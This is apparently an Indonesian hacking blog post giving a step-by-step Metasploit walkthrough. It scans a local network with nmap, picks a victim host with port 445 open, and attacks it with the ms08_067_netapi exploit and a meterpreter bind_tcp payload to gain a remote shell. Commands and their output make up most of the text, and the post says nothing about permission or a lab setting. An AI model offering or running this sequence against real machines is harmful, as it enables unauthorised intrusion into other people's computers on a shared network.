hacking dengan metasploit with backbox
selamat sore kawan'' kali ini saya mau share tentang hacking dengan metasploit with backbox
buat yang tidak memakai backbox os tutorial ini sama saja koq :)
oke dech tanpa banyak bacot aja =))
let's go hacking 8) open your terminal ( buka terminal kamu ) <== sok banget pake bahasa inggris wkwk sekarang kita ketik kan " ifconfig -a " <== jangan pakai tanda "
ntar hasil nya seperti ini :
flazer@flazer:~$ ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:c0:26:7f:82:8f
inet addr:192.168.2.5 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::2c0:26ff:fe7f:828f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:36659 errors:0 dropped:0 overruns:0 frame:0
TX packets:36943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:26464535 (26.4 MB) TX bytes:8073634 (8.0 MB)
Interrupt:18 Base address:0xe800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2756 errors:0 dropped:0 overruns:0 frame:0
TX packets:2756 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:257415 (257.4 KB) TX bytes:257415 (257.4 KB)
flazer@flazer:~$
sedangkan pada bagian ini " inet addr:192.168.2.5 " <== adalah ip kita :D
sekarang kita scan target nya yang sedang online
cara nya : nmap -sP 192.168.2.1/24 ( keterangan gak semua sama ip adress seperti itu ada juga yang seperti 192.168.1.1 pokok nya lain'' dech :D )
ntar hasil nya akan seperti ini :
flazer@flazer:~$ nmap -sP 192.168.2.1/24
Starting Nmap 6.00 ( http://nmap.org ) at 2013-02-04 16:49 WIT
Nmap scan report for 192.168.2.1
Host is up (0.00063s latency).
Nmap scan report for 192.168.2.4
Host is up (0.00047s latency).
Nmap scan report for 192.168.2.5
Host is up (0.00024s latency).
Nmap scan report for 192.168.2.6
Host is up (0.00039s latency).
Nmap scan report for 192.168.2.11
Host is up (0.00028s latency).
Nmap scan report for 192.168.2.14
Host is up (0.00038s latency).
Nmap scan report for 192.168.2.18
Host is up (0.00019s latency).
Nmap scan report for 192.168.2.21
Host is up (0.00035s latency).
Nmap scan report for 192.168.2.100
Host is up (0.00047s latency).
Nmap done: 256 IP addresses (9 hosts up) scanned in 6.45 seconds
flazer@flazer:~$
saya memilih yang " 192.168.2.14 "
sekarang kita lakukangan dengan ngeping ip . siapa tau di ip tersebut di pasang firewall terkadang sih
cara nya : ping 192.168.2.14
apabila hasil nya reply kita lanjut lagi ke cara selanjut nya
scan port terbuka dulu :D cara nya begini
" nmap 192.168.2.14 " <== ntar hasil nya akan seperti ini :
flazer@flazer:~$ nmap 192.168.2.14
Starting Nmap 6.00 ( http://nmap.org ) at 2013-02-04 16:52 WIT
Nmap scan report for 192.168.2.14
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
Nmap done: 1 IP address (1 host up) scanned in 1.22 seconds
oke sekarang kita lihat tuh ada port 445 yang open selanjut nya kita ke exploits nya cara nya ketik
" msfconsole " bila sudah ntar kita perintahkan begini lagi " show exploits "
" msfconsole " bila sudah ntar kita perintahkan begini lagi " show exploits "
ntar kita pilih yang " windows/smb/ms08_067_netapi "
cara nya begini " use windows/smb/ms08_067_netapi " <== tekan enter ya jangan tekan alt+f2 =))
apabila sudah sekarang kita perintahkan begini " show payloads "
ntar kita pilih " windows/meterpreter/bind_tcp "
lanjut gan " set payloads windows/meterpreter/bind_tcp "
sekarang kita Tambahkan target IP korban
" set RHOST 192.168.2.14 "
ntar hasil nya seperti ini
rhost => 192.168.2.14
msf exploit(ms08_067_netapi) >
langsung kita lakukan exploit nya ketik " exploit "
jika muncul prompt dibawah ini brarti serangan berhasil
meterpreter>
meterpreter>
oke sampai di sini dulu ya cape ngetik nya selamat mencoba :)
1 komentar — Skip ke Kotak Komentar
nih dalam satu jaringan apa ga??
Posting Komentar — or Kembali ke Postingan